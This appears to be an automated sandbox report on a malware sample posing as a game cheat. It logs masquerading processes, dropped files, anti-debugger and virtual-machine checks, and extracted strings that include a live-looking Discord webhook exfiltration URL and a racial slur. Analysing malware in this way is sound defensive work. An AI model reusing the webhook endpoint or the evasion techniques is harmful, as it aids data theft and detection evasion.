                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Idle.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: NCTSgL4t0B.exeBinary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- |##COMBO_%02D*UNKNOWN ITEM*%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
                                Source: NCTSgL4t0B.exeBinary or memory string: OLLYDBG.EXE
                                Source: NCTSgL4t0B.exeBinary or memory string: X64DBG.EXE
                                Source: NCTSgL4t0B.exeBinary or memory string: WINDBG.EXE
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
                                Source: C:\Edge\msedge.exeMemory allocated: 1A5D0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: DA0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: 1A900000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: 13D0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: 1AF0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: D30000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1730000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B150000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 18C0000 memory reserve | memory write watch
                                Source: C:\Edge\msedge.exeMemory allocated: 1B440000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: 2460000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Idle.exeMemory allocated: 1A6D0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DD4BF0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF735DD4BF0
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7824
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7113
                                Source: C:\Users\user\AppData\Local\Idle.exeDropped PE file which has not been started: C:\Users\user\Desktop\NDQNJGxB.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\LUAEjdyP.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\AwpzIjFt.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\MsCvKimq.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\YtKLaCEq.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\dgcKDzTe.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeDropped PE file which has not been started: C:\Users\user\Desktop\NohnZlpE.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeDropped PE file which has not been started: C:\Users\user\Desktop\iZOTduyR.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\tGwZoaKl.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeDropped PE file which has not been started: C:\Users\user\Desktop\pGvBroyE.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\sharmiXk.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Idle.exeDropped PE file which has not been started: C:\Users\user\Desktop\LAdenXtG.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\YlsMudWZ.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\WjFdZuSe.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\CQuHWLcS.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\onyQOgMn.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\BlhoAAti.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\aUzlTMCV.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\iyHbCGSC.logJump to dropped file
                                Source: C:\Edge\msedge.exeDropped PE file which has not been started: C:\Users\user\Desktop\PDYwKARr.logJump to dropped file
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-15765
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeAPI coverage: 7.2 %
                                Source: C:\Windows\Speech\physmeme.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7324Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Edge\msedge.exe TID: 7596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 7824 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 7113 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Idle.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Idle.exe TID: 7292Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 5664Thread sleep time: -30000s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 7280Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 1624Thread sleep time: -30000s >= -30000s
                                Source: C:\Edge\msedge.exe TID: 2196Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Idle.exe TID: 3380Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Idle.exe TID: 1532Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Edge\msedge.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\NCTSgL4t0B.exeCode function: 0_2_00007FF735DEBAEC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF735DEBAEC
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,12_2_00DEA69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,12_2_00DFC220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00E0B348 FindFirstFileExA,12_2_00E0B348
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 12_2_00DFE6A3 VirtualQuery,GetSystemInfo,12_2_00DFE6A3
                                Source: C:\Windows\Speech\physmeme.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Idle.exeThread delayed: delay time: 922337203685477
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                Source: Idle.exe, 00000036.00000002.1807636497.000000001AEB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                                Source: kdmapper.exe, 0000000C.00000003.1312368420.0000000000C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
                                Source: msedge.exe, 00000031.00000002.1782893319.000000001BE10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                                Source: wscript.exe, 00000010.00000002.1468871356.000000000359E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: Idle.exe, 00000036.00000002.1787812286.000000001277A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
